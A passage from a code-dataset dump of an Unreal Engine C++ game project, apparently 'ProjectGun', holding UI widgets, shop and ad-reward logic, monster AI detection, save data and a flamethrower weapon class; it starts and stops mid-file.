프로젝타일 무브먼트 컴포넌트\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUProjectileMovementComponent* ProjectileMovementComponent;\n\n\t// 피격시 나타나는 이펙트\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUParticleSystemComponent*\tBurstingEffect;\n};\n" }, { "alpha_fraction": 0.7722772359848022, "alphanum_fraction": 0.7739273905754089, "avg_line_length": 22.764705657958984, "blob_id": "923fb70add1b2bb89d48e4fd696713bb0860f183", "content_id": "81ad93a9edcc2c95301d8122b3c90d0d47424182", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1214, "license_type": "no_license", "max_line_length": 79, "num_lines": 51, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetMessagePopup.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetMessagePopup::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != Text_TitleName);\n\tABCHECK(nullptr != Text_Description);\n\tABCHECK(nullptr != Btn_OK);\n\n\tBtn_OK->OnClicked.AddDynamic(this, &UPG_UserWidgetMessagePopup::OnBtnOK);\n}\n\nvoid UPG_UserWidgetMessagePopup::SetVisibility(ESlateVisibility InVisibility)\n{\n\tSuper::SetVisibility(InVisibility);\n\n\tif (ESlateVisibility::Hidden != InVisibility)\n\t{\n\t\tif (PopupPlaySound)\n\t\t\tPlaySound(PopupPlaySound);\n\t}\n}\n\nvoid UPG_UserWidgetMessagePopup::SetTitle(FString kTitle)\n{\n\tABCHECK(nullptr != Text_TitleName);\n\tText_TitleName->SetText(FText::FromString(kTitle));\n}\n\nvoid UPG_UserWidgetMessagePopup::SetDescription(FString kDescription)\n{\n\tABCHECK(nullptr != Text_Description);\n\tText_Description->SetText(FText::FromString(kDescription));\n}\n\nvoid UPG_UserWidgetMessagePopup::SetValue(int32 nValue)\n{\n\tm_nValue = nValue;\n}\n\nvoid UPG_UserWidgetMessagePopup::OnBtnOK()\n{\n\tOnBtnClickedOK.Broadcast();\n\tOnBtnClickedOK_OneValue.Broadcast(m_nValue);\n}\n" }, { "alpha_fraction": 0.7567567825317383, "alphanum_fraction": 0.7621621489524841, "avg_line_length": 28.854839324951172, "blob_id": "44dd4313abd76a100ed9059eb3333977f488fa32", "content_id": "e5d0fc3a88299fcc046d2c4af5c3f8dc2eaff83e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1852, "license_type": "no_license", "max_line_length": 115, "num_lines": 62, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetWeaponInventory.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetWeaponInventory.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <Components/Button.h>\n\nvoid UPG_UserWidgetWeaponInventory::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tfor (int32 nIndex = 0; nIndex < eMaxInvenIndex; ++nIndex)\n\t{\n\t\tFString BtnWidgetName = FString::Printf(TEXT(\"WB_WeaponBox_%d\"), nIndex);\n\t\tauto pBtnWeapon = Cast<UPG_UserWidgetWeaponBox>(GetWidgetFromName(*BtnWidgetName));\n\t\tif (nullptr == pBtnWeapon)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find widget %s\"), *BtnWidgetName);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpBtnWeapon->OnBtnWeaponClicked_WeaponIndex.AddUObject(this, &UPG_UserWidgetWeaponInventory::OnSelectWeaponIndex);\n\t}\n}\n\nvoid UPG_UserWidgetWeaponInventory::UpdateWeaponInventory()\n{\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase);\n\n\tfor (int32 nIndex = 0; nIndex < eMaxInvenIndex; ++nIndex)\n\t{\n\t\tFString BtnWidgetName = FString::Printf(TEXT(\"WB_WeaponBox_%d\"), nIndex);\n\t\tauto pBtnWeapon = Cast<UPG_UserWidgetWeaponBox>(GetWidgetFromName(*BtnWidgetName));\n\t\tif (nullptr == pBtnWeapon)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find widget %s\"), *BtnWidgetName);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpBtnWeapon->SetWeaponIndex(pGameModeBase, nIndex);\n\t}\n}\n\nvoid UPG_UserWidgetWeaponInventory::SetOpenSlotIndex(int32 nSlotIndex)\n{\n\tm_nOpenSlotIndex = nSlotIndex;\n}\n\nvoid UPG_UserWidgetWeaponInventory::OnBtnClose()\n{\n\tOnBtnClickedClose.Broadcast(m_nOpenSlotIndex, PG_INVALID_INDEX);\n\tm_nOpenSlotIndex = PG_INVALID_INDEX;\n}\n\nvoid UPG_UserWidgetWeaponInventory::OnSelectWeaponIndex(int32 nWeaponIndex)\n{\n\tOnBtnClickedClose.Broadcast(m_nOpenSlotIndex, nWeaponIndex);\n\tm_nOpenSlotIndex = PG_INVALID_INDEX;\n}" }, { "alpha_fraction": 0.7634600400924683, "alphanum_fraction": 0.7667772173881531, "avg_line_length": 30.360000610351562, "blob_id": "61dc5d337dbbd6590bee7fdcabdbea42e6e9590a", "content_id": "2f81600899e674f05d76efaee377df23380434ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3921, "license_type": "no_license", "max_line_length": 104, "num_lines": 125, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetShop.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetShop.h\"\n#include \"UI/PG_UserWidgetShopWeaponBox.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetShop::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\t//ABCHECK(nullptr != Text_ADRemainTime);\n\tPG_WIDGET_LINK(UTextBlock, Text_ADRemainTime);\n\t\n\tm_pBtn_ADView = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_ADView\")));\n\tABCHECK(nullptr != m_pBtn_ADView);\n\n\tfor (int32 nIndex = 0; nIndex < eMaxWeaponShopItemSlot; ++nIndex)\n\t{\n\t\tFString kWeaponShopBoxWidgetName = FString::Printf(TEXT(\"WB_ShopWeaponBox_%d\"), nIndex);\n\t\tauto pWeaponShopBox = Cast<UPG_UserWidgetShopWeaponBox>(GetWidgetFromName(*kWeaponShopBoxWidgetName));\n\t\tif (nullptr == pWeaponShopBox)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find UserWidgetShopWeaponBox (Index : %d)\"), nIndex);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpWeaponShopBox->OnItemBuyWeapon.AddUObject(this, &UPG_UserWidgetShop::UpdateWeaponShopLayout);\n\t}\n}\n\nvoid UPG_UserWidgetShop::NativeTick(const FGeometry& MyGeometry, float DeltaTime)\n{\n\tSuper::NativeTick(MyGeometry, DeltaTime);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tint32 nRemainTime = pGameInstance->GetADRemainTime(EADType::eAT_WeaponShop);\n\tSetADRemainTime(nRemainTime);\n\tSetBtnEnableAD((nRemainTime <= 0));\n\n}\n\nvoid UPG_UserWidgetShop::UpdateLethalShopLayout()\n{\n\n}\n\nvoid UPG_UserWidgetShop::UpdateWeaponShopLayout()\n{\n\tUpdateRewardPoint();\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tfor (int32 nIndex = 0; nIndex < eMaxWeaponShopItemSlot; ++nIndex)\n\t{\n\t\tFString kWeaponShopBoxWidgetName = FString::Printf(TEXT(\"WB_ShopWeaponBox_%d\"), nIndex);\n\t\tauto pWeaponShopBox = Cast<UPG_UserWidgetShopWeaponBox>(GetWidgetFromName(*kWeaponShopBoxWidgetName));\n\t\tif (nullptr == pWeaponShopBox)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find UserWidgetShopWeaponBox (Index : %d)\"), nIndex);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpWeaponShopBox->SetWeaponIndex(pGameModeMainLobby, nIndex);\n\t\tpWeaponShopBox->SetSlotIndex(nIndex);\n\t}\n}\n\nvoid UPG_UserWidgetShop::SetBtnEnableAD(bool bEnable)\n{\n\tABCHECK(nullptr != m_pBtn_ADView);\n\n\tif (m_pBtn_ADView->bIsEnabled != bEnable)\n\t\tm_pBtn_ADView->SetIsEnabled(bEnable);\n\n\tif (bEnable)\n\t\tm_pkText_ADRemainTime->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tm_pkText_ADRemainTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetShop::SetADRemainTime(int32 nTime)\n{\n\tm_pkText_ADRemainTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTime)));\n}\n\nvoid UPG_UserWidgetShop::OnADRewardVideoSucessed()\n{\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode);\n\n\tint32 nRewardPoint = pGameMode->GetSavePlayerData()->m_nRewardPoint + PG_ADVIEW_SHOP_REWARD;\n\tpGameMode->GetSavePlayerData()->m_nRewardPoint = nRewardPoint;\n\tpGameMode->SavePlayerData();\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\tpMyPlayerState->SetRewardPoint(nRewardPoint);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_WeaponShop);\n\n\tUpdateWeaponShopLayout();\n}\n\nvoid UPG_UserWidgetShop::OnADRewardVideoClosed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_WeaponShop);\n}" }, { "alpha_fraction": 0.7498349547386169, "alphanum_fraction": 0.7567656636238098, "avg_line_length": 32.30769348144531, "blob_id": "057c2230db6d0ebf006662d48527adbeba8b8411", "content_id": "4b74116fa4875e1e6efcbf00d5fa0711e9a533f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3084, "license_type": "no_license", "max_line_length": 135, "num_lines": 91, "path": "/Source/Project_Gun/Private/AI/BTService_MonDetect.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"AI/BTService_MonDetect.h\"\n#include \"AI/PG_AICon_Mon.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <BehaviorTree/BlackboardComponent.h>\n#include <DrawDebugHelpers.h>\n\nUBTService_MonDetect::UBTService_MonDetect()\n{\n\n}\n\nvoid UBTService_MonDetect::TickNode(UBehaviorTreeComponent& OwnerComp, uint8* NodeMemory, float DeltaSeconds)\n{\n\tSuper::TickNode(OwnerComp, NodeMemory, DeltaSeconds);\n\n\tAPawn* ControllingPawn = OwnerComp.GetAIOwner()->GetPawn();\n\tABCHECK(nullptr != ControllingPawn);\n\n\tUWorld* World = ControllingPawn->GetWorld();\n\tFVector Center = ControllingPawn->GetActorLocation();\n\tABCHECK(nullptr != World);\n\n\tint32 nMDetectRange = OwnerComp.GetBlackboardComponent()->GetValueAsInt(APG_AICon_Mon::DetectRangeKey);\n\tint32 nMChaseRange = OwnerComp.GetBlackboardComponent()->GetValueAsInt(APG_AICon_Mon::ChaseRangeKey);\n\n\tfloat fRange = (float)(OwnerComp.GetBlackboardComponent()->GetValueAsObject(APG_AICon_Mon::TargetKey) ? nMChaseRange : nMDetectRange);\n\n\t// AI 최적화 적용\n\t// 몬스터 시야거리 외 불필요한 콜리전 체크를 막는다.\n\tauto DefaultObject = World->GetFirstPlayerController()->GetCharacter();\n\tif (DefaultObject)\n\t{\n\t\tfloat fDistance = FMath::Abs<float>(FVector::Distance(DefaultObject->GetActorLocation(), Center));\n\t\tif (fDistance > fRange)\n\t\t{\n\t\t\tif (ControllingPawn->GetActorEnableCollision())\n\t\t\t\tControllingPawn->SetActorEnableCollision(false);\n\n\t\t\tif (ControllingPawn->IsActorTickEnabled())\n\t\t\t\tControllingPawn->SetActorTickEnabled(false);\n\n\t\t\treturn;\n\t\t}\n\t}\n\n\tif (false == ControllingPawn->GetActorEnableCollision())\n\t\tControllingPawn->SetActorEnableCollision(true);\n\n\tif (false == ControllingPawn->IsActorTickEnabled())\n\t\tControllingPawn->SetActorTickEnabled(true);\n\n\tTArray<FOverlapResult> OverlapResults;\n\tFCollisionQueryParams CollisionQueryParms(NAME_None, false, ControllingPawn);\n\tbool bResult = World->OverlapMultiByChannel(\n\t\tOverlapResults,\n\t\tCenter,\n\t\tFQuat::Identity,\n\t\tECollisionChannel::ECC_GameTraceChannel2,\n\t\tFCollisionShape::MakeSphere(fRange),\n\t\tCollisionQueryParms\n\t);\n\n\tif (bResult)\n\t{\n\t\tfor (auto& OverlapResult : OverlapResults)\n\t\t{\n\t\t\tAPG_MyChar* MyCharacter = Cast<APG_MyChar>(OverlapResult.GetActor());\n\t\t\tif (MyCharacter && MyCharacter->GetController()->IsPlayerController())\n\t\t\t{\n\t\t\t\tOwnerComp.GetBlackboardComponent()->SetValueAsObject(APG_AICon_Mon::TargetKey, MyCharacter);\n\t\t\t\t//DrawDebugSphere(World, Center, fRange, 16, FColor::Green, false, 0.2f);\n\t\t\t\t//DrawDebugPoint(World, MyCharacter->GetActorLocation(), 10.0f, FColor::Blue, false, 0.2f);\n\t\t\t\t//DrawDebugLine(World, ControllingPawn->GetActorLocation(), MyCharacter->GetActorLocation(), FColor::Blue, false, 0.2f);\n\t\t\t\treturn;\n\t\t\t}\n\t\t}\n\n\t\tOwnerComp.GetBlackboardComponent()->SetValueAsObject(APG_AICon_Mon::TargetKey, nullptr);\n\t}\n\telse\n\t{\n\t\t// Can't Find Character\n\t\tOwnerComp.GetBlackboardComponent()->ClearValue(APG_AICon_Mon::TargetKey);\n\t}\n\n\t//DrawDebugSphere(World, Center, fRange, 16, FColor::Red, false, 0.2f);\n}" }, { "alpha_fraction": 0.740634024143219, "alphanum_fraction": 0.7550432085990906, "avg_line_length": 18.33333396911621, "blob_id": "c9aac3b21ef645a039110665550c895cc2585855", "content_id": "689d0417edff445749070c06a19bac202a10db6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 349, "license_type": "no_license", "max_line_length": 79, "num_lines": 18, "path": "/Source/Project_Gun/Private/SaveData/PG_SaveStageData.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"SaveData/PG_SaveStageData.h\"\n\nUPG_SaveStageData::UPG_SaveStageData()\n{\n\n}\n\nFString UPG_SaveStageData::GetSlotName(int32 a_nStageID)\n{\n\treturn FString::Printf(TEXT(\"SaveStageData_%d\"), a_nStageID);\n}\n\nint32 UPG_SaveStageData::GetPlayerIndex()\n{\n\treturn 0;\n}" }, { "alpha_fraction": 0.7885952591896057, "alphanum_fraction": 0.7913768887519836, "avg_line_length": 28.97916603088379, "blob_id": "f21e1193292f12523b3465d72313a93ea3b411fc", "content_id": "6f4f07206f990683aff695ffa6b78a36c6dc1d24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1440, "license_type": "no_license", "max_line_length": 104, "num_lines": 48, "path": "/Source/Project_Gun/Private/Game/GameMode/PG_GameModeMainLobby.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"SaveData/PG_SaveStageData.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\nAPG_GameModeMainLobby::APG_GameModeMainLobby()\n{\n\tPlayerStateClass = APG_MyPlayerState::StaticClass();\n}\n\nvoid APG_GameModeMainLobby::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nbool APG_GameModeMainLobby::IsClearMission(enum EStageClearType a_ekStageClearType)\n{\n\tABCHECK(nullptr != m_pSelectSaveStageData, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tconst FPGStageData*\tcpStageData = pGameInstance->GetTableStageData(m_pSelectSaveStageData->m_nStageID);\n\tABCHECK(nullptr != cpStageData, false);\n\n\tswitch (a_ekStageClearType)\n\t{\n\tcase EStageClearType::eSCT_AmountKill:\n\t\treturn m_pSelectSaveStageData->m_bWasClearAmount;\n\tcase EStageClearType::eSCT_ClearTime:\n\t\treturn m_pSelectSaveStageData->m_bWasClearTime;\n\tcase EStageClearType::eSCT_Lethal:\n\t\treturn m_pSelectSaveStageData->m_bWasClearLethal;\n\t}\n\n\treturn false;\n}\n\nvoid APG_GameModeMainLobby::SaveWeaponEquipSlot(int32 nSlotIndex, int32 nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pSavePlayerData);\n\tm_pSavePlayerData->m_kEquipWeaponTableIndex[nSlotIndex] = nWeaponIndex;\n\n\tABCHECK(SavePlayerData());\n}" }, { "alpha_fraction": 0.7610823512077332, "alphanum_fraction": 0.7610823512077332, "avg_line_length": 25.72307777404785, "blob_id": "4eda0a5770d292cc9fff85bf528e1af711682a33", "content_id": "22f1cb09f7398d7ca47ad5d3a8ce1872f2275fb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1791, "license_type": "no_license", "max_line_length": 109, "num_lines": 65, "path": "/Source/Project_Gun/Public/Anim/PG_AnimIns_MyChar.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Animation/AnimInstance.h>\n#include \"PG_AnimIns_MyChar.generated.h\"\n\n\nDECLARE_MULTICAST_DELEGATE(FOnFireDelegate);\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_AnimIns_MyChar : public UAnimInstance\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tUPG_AnimIns_MyChar();\n\tvirtual void NativeUpdateAnimation(float DeletaSeconds) override;\n\n\tbool IsVaildTargetMonster();\t// 몬스터 타겟팅 되어있는지 여부\n\tbool IsAimingComplete();\t\t// 조준완료 여부\n\n\tvoid SetRotation(float fYaw);\n\tvoid SetMontageFireReaction(UAnimMontage* AnimMontage);\n\npublic :\n\tUFUNCTION()\n\tvoid OnTargetMonster(class APG_MonChar* pTarget);\n\n\t\n\npublic :\n\tFOnFireDelegate OnFire;\n\n\tUFUNCTION()\n\tvoid AnimNotify_Fire();\n\nprivate :\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tfloat CurrentPawnSpeed;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tfloat CurrentPawnSpeedRatio;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tfloat fAimYaw;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tfloat fAimPitch;\n\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Pawn\", Meta = (AllowPrivateAccess = true))\n\tclass APG_MonChar* TargetMonster;\n\n\t// 무기 발사 몽타주\n\tUPROPERTY(VisibleAnywhere, BlueprintReadOnly, Category = \"PG Animation\", Meta = (AllowPrivateAccess = true))\n\tUAnimMontage* MontageFireReaction;\n\n\t//UPROPERTY(EditAnywhere, BlueprintReadOnly, Category = Pawn, Meta = (AllowPrivateAccess = true))\n\t//bool IsDead;\n};\n" }, { "alpha_fraction": 0.5516356825828552, "alphanum_fraction": 0.5516356825828552, "avg_line_length": 29.568628311157227, "blob_id": "4fa71b570b1d8a0ff20b184e9193d4e627bddf71", "content_id": "aa90db3b32d117a7cdd30e27527ea432e8d8828f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1707, "license_type": "no_license", "max_line_length": 97, "num_lines": 51, "path": "/Source/Project_Gun/Public/Game/GameMode/PG_GameModeStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <GameFramework/GameModeBase.h>\n#include \"PG_GameModeStage.generated.h\"\n\n/**\n * GameMode : 레벨당 한 개의 게임 모드를 가지며 게임의 룰을 정의한다.\n */\nUCLASS()\nclass PROJECT_GUN_API APG_GameModeStage : public APG_GameModeBase\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_GameModeStage();\n\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void PostLogin(APlayerController* NewPlayer) override;\n\tvirtual void BeginPlay() override;\n\npublic :\n\t//===================================================\n\t// Mission\n\t//===================================================\n\tvirtual bool IsClearMission(EStageClearType a_ekStageClearType) override;\t\t// 현재 각 타입의 미션 클리어 여부\n\tbool IsWasClearMisiion(EStageClearType a_ekStageClearType);\t\t\t\t\t\t// 이전에 각 타입의 미션 클리어 여부\n\tbool IsStageClear();\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// 스테이지 클리어 여부\n\n\t//===================================================\n\t// Save Data\n\t//===================================================\n\tvirtual bool SavePlayerData() override;\n\tvirtual bool SaveStageData() override;\n\npublic:\n\t//============================================\n\t// 플레이어 데이터 (Player)\n\t//============================================\n\tbool SetSavePlayerData(const struct FPGPlayerData& a_rkPlayerData);\n\n\t//============================================\n\t// 스테이지 데이터 (Stage)\n\t//============================================\n\tbool SetSaveStageData(const struct FPGStagePlayData& a_rkStagePlayData);\n\n};\n" }, { "alpha_fraction": 0.7524752616882324, "alphanum_fraction": 0.7536633610725403, "avg_line_length": 24.00990104675293, "blob_id": "86b0abaafd45e09005872a7824d1c47696cdb37f", "content_id": "f97bba576a1e1ea9b8f25fcc54b9a22a5d862dbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2601, "license_type": "no_license", "max_line_length": 112, "num_lines": 101, "path": "/Source/Project_Gun/Private/BlueScriptObject/Weapon/PG_WeaponFlameGun.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"BlueScriptObject/Weapon/PG_WeaponFlameGun.h\"\n#include \"BlueScriptObject/Projectile/PG_ProjectileFlame.h\"\n#include \"Character/PG_MonChar.h\"\n\nAPG_WeaponFlameGun::APG_WeaponFlameGun()\n{\n\tPrimaryActorTick.bCanEverTick = true;\n}\n\nvoid APG_WeaponFlameGun::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tif (FiringEffect)\n\t{\n\t\tFName SocketFire(TEXT(\"Socket_FiringEffect\"));\n\t\tFiringEffect->AttachToComponent(Weapon, FAttachmentTransformRules::SnapToTargetNotIncludingScale, SocketFire);\n\t\tFiringEffect->SetActive(false, true);\n\t}\n}\n\nvoid APG_WeaponFlameGun::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tif (nullptr != CurrFireFlame)\n\t\tFlameLength += DeltaTime;\n}\n\nvoid APG_WeaponFlameGun::Destroyed()\n{\n\tRemoveCurrFireFlame();\n\tSuper::Destroyed();\n}\n\nvoid APG_WeaponFlameGun::Fire()\n{\n\tFName\t\tSocketFire(TEXT(\"Socket_Fire_0\"));\n\tFVector\t\tvLocation = Weapon->GetSocketLocation(SocketFire);\n\tFRotator\trRotation = Weapon->GetSocketRotation(SocketFire);\n\n\tif (nullptr != CurrFireFlame)\n\t{\n\t\tRemoveCurrFireFlame();\n\t}\n\n\tUWorld* World = GetWorld();\n\tif (World)\n\t{\n\t\tFActorSpawnParameters SpawnParams;\n\t\tSpawnParams.Owner = this;\n\t\tSpawnParams.Instigator = GetInstigator();\n\n\t\t// 총구 위치에 발사체를 스폰시킵니다.\t\t\n\t\tCurrFireFlame = World->SpawnActor<APG_Projectile>(WeaponData.BProjectile, vLocation, rRotation, SpawnParams);\n\t\tABCHECK(nullptr != CurrFireFlame);\n\n\t\t// 발사 방향을 알아냅니다.\n\t\tFVector LaunchDirection = rRotation.Vector();\n\n\t\t// 몬스터가 사용하는 무기 여부\n\t\tbool bMonsterWeapon = (nullptr != Cast<APG_MonChar>(GetOwner()));\n\n\t\tCurrFireFlame->FireInDirection(GetWeaponData(), LaunchDirection, bMonsterWeapon);\n\t\tCurrFireFlame->AttachToActor(this, FAttachmentTransformRules::SnapToTargetNotIncludingScale);\n\n\t\tauto ProjectileFlame = Cast<APG_ProjectileFlame>(CurrFireFlame);\n\t\tif (ProjectileFlame)\n\t\t\tProjectileFlame->SetScaleTime(FlameLength);\n\t}\n\n\tif (FiringEffect && false == FiringEffect->IsActive())\n\t\tFiringEffect->SetActive(true, true);\n\n\tif (FireSound && false == FireSound->IsActive())\n\t\tFireSound->Play();\n}\n\nvoid APG_WeaponFlameGun::StopFire()\n{\n\tFlameLength = 0.0f;\n\n\tif (FiringEffect && FiringEffect->IsActive())\n\t\tFiringEffect->SetActive(false);\n\n\tif (FireSound && FireSound->IsActive())\n\t\tFireSound->Stop();\n\n\tRemoveCurrFireFlame();\n}\n\nvoid APG_WeaponFlameGun::RemoveCurrFireFlame()\n{\n\tif (CurrFireFlame)\n\t{\n\t\tCurrFireFlame->DetachFromActor(FDetachmentTransformRules::KeepRelativeTransform);\n\t\tCurrFireFlame->Destroy();\n\t}\n}" }, { "alpha_fraction": 0.7789165377616882, "alphanum_fraction": 0.7789165377616882, "avg_line_length": 23.428571701049805, "blob_id": "02b6066c0a5ce498abb33300b0aff839b1817eef", "content_id": "de1519bda16704652645f81097e0dc4217166d82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 685, "license_type": "no_license", "max_line_length": 79, "num_lines": 28, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetSkillSlot.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetSkillSlot.h\"\n\n#include <Components/Overlay.h>\n#include <Components/Button.h>\n\nvoid UPG_UserWidgetSkillSlot::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UButton, BtnSkill);\n\tPG_WIDGET_LINK(UOverlay, OverlayLightBox);\n}\n\nvoid UPG_UserWidgetSkillSlot::SetEnable(bool bEnable)\n{\n\tABCHECK(nullptr != m_pkBtnSkill);\n\tABCHECK(nullptr != m_pkOverlayLightBox);\n\n\tm_pkBtnSkill->SetIsEnabled(bEnable);\n\n\tif (bEnable)\n\t\tm_pkOverlayLightBox->SetVisibility(ESlateVisibility::SelfHitTestInvisible);\n\telse\n\t\tm_pkOverlayLightBox->SetVisibility(ESlateVisibility::Hidden);\n}" }, { "alpha_fraction": 0.7379679083824158, "alphanum_fraction": 0.7419785857200623, "avg_line_length": 22.375, "blob_id": "fd185ee304b0bc4e14acf1a40ab550544e2533f6", "content_id": "e1ec793a63f00038d61d0c4bc6ccccd006476fae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 832, "license_type": "no_license", "max_line_length": 79, "num_lines": 32, "path": "/Source/Project_Gun/Public/Game/Console/Commands/PG_Command.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n/**\n * \n */\nclass PG_Command\n{\npublic:\n\tPG_Command();\n\tvirtual ~PG_Command();\n\npublic :\n\tvirtual void Init(class 